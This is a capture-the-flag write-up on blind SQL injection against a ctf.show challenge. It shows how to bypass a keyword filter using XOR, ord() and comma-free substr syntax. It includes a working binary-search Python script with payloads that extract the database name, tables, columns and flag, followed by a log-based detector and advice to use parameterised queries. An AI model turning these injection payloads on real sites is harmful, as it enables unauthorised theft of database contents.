Input 1^1^1:

Input 1^0^1:

The parameter filters keywords such as limit, +, single quotes, commas and ascii, so we consider using the form substr((database())from({})for(1)) to bypass the filter.
id=1^(ord(substr((database())from(1)for(1)))>23)^1
Normal output (same as 1^1^1), which means the ASCII code of the first character of the database name is greater than 23.
id=1^(ord(substr((database())from(1)for(1)))>123)^1
No output (same as 1^0^1), which means the ASCII code of the first character of the database name is less than 123.
Try a binary-search blind injection; the script is as follows:
import requests

url = 'http://2f7bbe27-e7d3-4b53-848f-77366c18e51b.chall.ctf.show/index.php?id=1'
flag = ''
for i in range(1, 50):
    # binary search over printable ASCII (32..127) for the i-th character
    high = 127
    low = 32
    mid = (high+low)//2
    while high > low:
        payload = "^(ord(substr((database())from({})for(1)))>{})^1".format(i, mid)
        # payload = "^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from({})for(1)))>{})^1".format(i,mid)
        # payload = "^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)in(0x666c6167))from({})for(1)))>{})^1".format(i,mid)
        # payload = "^(ord(substr((select(group_concat(flag))from(web1.flag))from({})for(1)))>{})^1".format(i,mid)
        s = requests.get(url=url+payload)
        if 'Rudyard' in s.text:   # true branch (1^1^1): character is greater than mid
            low = mid+1
        else:                      # false branch (1^0^1): character is at most mid
            high = mid
        mid = (high+low)//2
    flag += chr(mid)
    print(flag)
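The probes above leave a recognisable trace in the web server's access log: many requests from one client to the same endpoint whose query string carries an XOR expression with ord(substr(... from(...) for(...))) and a comparand that changes by halving. The following detector is an added example written for this page, not code from the original writeup; it scores decoded query strings against those signatures and reports clients that repeat them, and the log format, IP addresses and log lines are all constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Combined-log style line: ip ident user [time] "METHOD path PROTO" status ... (constructed format)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

# Signatures for the bypass shown in the writeup: MySQL's comma-free SUBSTR(x FROM n FOR m)
# syntax, ORD() standing in for the filtered ASCII(), and an XOR-ed parenthesised comparison.
SIGNATURES = [
    re.compile(r'substr\s*\(.*\bfrom\s*\(.*\bfor\s*\(', re.I),
    re.compile(r'\bord\s*\(', re.I),
    re.compile(r'\^\s*\('),
]

def normalise_query(path):
    """Return the lower-cased, URL-decoded query string of a request path ('' if none).
    Decoding twice also catches simple double-encoding of ^ and >."""
    if '?' not in path:
        return ''
    return unquote_plus(unquote_plus(path.split('?', 1)[1])).lower()

def score_request(path):
    """Number of signatures matching the decoded query string (0..len(SIGNATURES))."""
    q = normalise_query(path)
    return sum(1 for sig in SIGNATURES if sig.search(q))

def detect_blind_probes(lines, min_score=2, min_hits=3):
    """Map client IP -> count of requests scoring >= min_score, keeping only clients with
    at least min_hits such requests (a binary search needs ~7 probes per character)."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m and score_request(m.group('path')) >= min_score:
            hits[m.group('ip')] = hits.get(m.group('ip'), 0) + 1
    return {ip: n for ip, n in hits.items() if n >= min_hits}

# Constructed sample log: four halving probes from one client, mostly normal traffic from another.
PROBE = '/index.php?id=1%5E(ord(substr((database())from(1)for(1)))%3E{})%5E1'
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:0{0} +0000] "GET {1} HTTP/1.1" 200 512'.format(i, PROBE.format(m))
    for i, m in enumerate((79, 103, 115, 121))
] + [
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=2 HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Jan/2024:10:00:07 +0000] "GET {} HTTP/1.1" 200 512'.format(PROBE.format(64)),
]

if __name__ == '__main__':
    print(detect_blind_probes(SAMPLE_LOG))   # {'203.0.113.5': 4}
```

Signature matching is a triage aid, not a fix: the page's filter failed precisely because it blacklisted tokens, so the durable mitigation is a parameterised query for id, with this detector used to spot probing against endpoints that have not yet been fixed.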
